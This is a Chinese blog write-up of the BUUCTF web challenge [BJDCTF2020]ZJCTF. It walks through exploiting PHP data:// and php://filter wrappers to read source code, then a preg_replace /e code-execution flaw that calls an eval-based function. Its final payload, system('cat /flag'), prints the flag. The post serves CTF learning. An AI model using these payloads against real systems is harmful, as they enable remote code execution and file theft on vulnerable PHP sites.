当前位置:网站首页>BUUCTF WEB [BJDCTF2020]ZJCTF,不过如此
BUUCTF WEB [BJDCTF2020]ZJCTF,不过如此
2022-04-23 12:27:00 【Y1Daa】
BUUCTF WEB [BJDCTF2020]ZJCTF,不过如此
-
进入环境后得到源码
<?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_match("/flag/",$file)){ die("Not now!"); } include($file); //next.php } else{ highlight_file(__FILE__); } ?> -
使用PHP伪协议构造payload
?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php回显
PD9waHAKJGlkID0gJF9HRVRbJ2lkJ107CiRfU0VTU0lPTlsnaWQnXSA9ICRpZDsKCmZ1bmN0aW9uIGNvbXBsZXgoJHJlLCAkc3RyKSB7CiAgICByZXR1cm4gcHJlZ19yZXBsYWNlKAogICAgICAgICcvKCcgLiAkcmUgLiAnKS9laScsCiAgICAgICAgJ3N0cnRvbG93ZXIoIlxcMSIpJywKICAgICAgICAkc3RyCiAgICApOwp9CgoKZm9yZWFjaCgkX0dFVCBhcyAkcmUgPT4gJHN0cikgewogICAgZWNobyBjb21wbGV4KCRyZSwgJHN0cikuICJcbiI7Cn0KCmZ1bmN0aW9uIGdldEZsYWcoKXsKCUBldmFsKCRfR0VUWydjbWQnXSk7Cn0Kbase64解密
<?php $id = $_GET['id']; $_SESSION['id'] = $id; function complex($re, $str) { return preg_replace( '/(' . $re . ')/ei', 'strtolower("\\1")', $str ); } foreach($_GET as $re => $str) { echo complex($re, $str). "\n"; } function getFlag(){ @eval($_GET['cmd']); } -
这里可以看出cmd参数存在命令执行漏洞,但问题是如何调用getFlag()函数。这里涉及到 preg_replace /e 模式的代码执行漏洞
function complex($re, $str) { return preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str); } foreach($_GET as $re => $str) { echo complex($re, $str). "\n"; }若payload为
/?.*={${phpinfo()}}则
原先的语句: preg_replace('/(' . $regex . ')/ei', 'strtolower("\\1")', $value); 变成了语句: preg_replace('/(.*)/ei', 'strtolower("\\1")', { ${ phpinfo()}});注意:正则表达式模式或部分模式两边添加
()将导致匹配到的字符串存储到临时缓冲区中,缓冲区编号从1开始,最多存储99个子表达式。每个缓冲区都可以用\n访问,其中n为缓冲区编号。preg_replace('/(.*)/ei', 'strtolower("\\1")', {${phpinfo()}});将会把{${phpinfo()}}存储到缓冲区1,此时匹配后的字符串为/(\\1)/ei,\\1即\1,这将会导致反向引用缓冲区的内容,将其修改为/{${phpinfo()}}/ei,从而导致命令执行。 -
在本题中,PHP会将传入的非法的
$_GET数组参数名转化为下划线,即将.*转化为_。可以修改payload为?\S*=${getFlag()}&cmd=...其中
\S表示匹配任何非空白字符,从而达到我们调用getFlag函数的目的 -
构造payload
?\S*=${getFlag()}&cmd=system('cat /flag');回显
flag{6b53cc7c-e9e8-47a1-80ed-10ca16c81ae5} system('cat /flag');
版权声明
本文为[Y1Daa]所创,转载请带上原文链接,感谢
https://blog.csdn.net/weixin_51412071/article/details/124351859
边栏推荐
- On lambda powertools typescript
- S2-062 remote command execution vulnerability recurrence (cve-2021-31805)
- 外包干了五年,废了...
- 消息队列概述
- Win10 splash screen after startup
- Uni app native app cloud packaging integrated Aurora push (jg-jpush) detailed tutorial
- Qt进程间通信
- 第二十四课 经典问题解析
- c# 设置logo图标和快捷方式的图标
- Fabric 1.0 source code analysis (33) implementation of peer channel command and subcommand
猜你喜欢
Qt绘制文字
C# F23. Stringsimilarity Library: String repeatability, text similarity, anti plagiarism
Next.js 静态数据生成以及服务端渲染的方式
电脑系统卡如何解决?
1. Construction of electron development environment
Next. JS static data generation and server-side rendering
编程辅助工具推荐:图片工具snipaste
Idea setting copyright information
VMware虚拟机使用esxi 导出硬盘vmdk文件
c# 设置logo图标和快捷方式的图标
随机推荐
Hard core parsing promise object (do you know these seven common APIs and seven key questions?)
网站首页文件被攻击篡改的形式有哪些
【微信小程序】z-index失效
On using go language to create websocket service
Markdown语法学习
Why is there a wrapper class? By the way, how to convert basic data types, wrapper classes and string classes?
Windows2008系统如何切换PHP版本
Qt绘制图像
论文解读(CGC)《CGC: Contrastive Graph Clustering for Community Detection and Tracking》
Source code analysis of synchronousqueue
Outsourcing for five years, abandoned
传统企业如何应对数字化转型?这些书给你答案
为什么要有包装类,顺便说一说基本数据类型、包装类、String类该如何转换?
Intelligent multi line elastic cloud adds independent IP address. How to realize multi line function?
I changed to a programmer at the age of 31. Now I'm 34. Let me talk about my experience and some feelings
CGC: contractual graph clustering for community detection and tracking
智能多线弹性云增加独立的IP地址,如何实现多线功能?
S2-062 remote command execution vulnerability recurrence (cve-2021-31805)
硬核解析Promise对象(这七个必会的常用API和七个关键问题你都了解吗?)
Next.js 静态数据生成以及服务端渲染的方式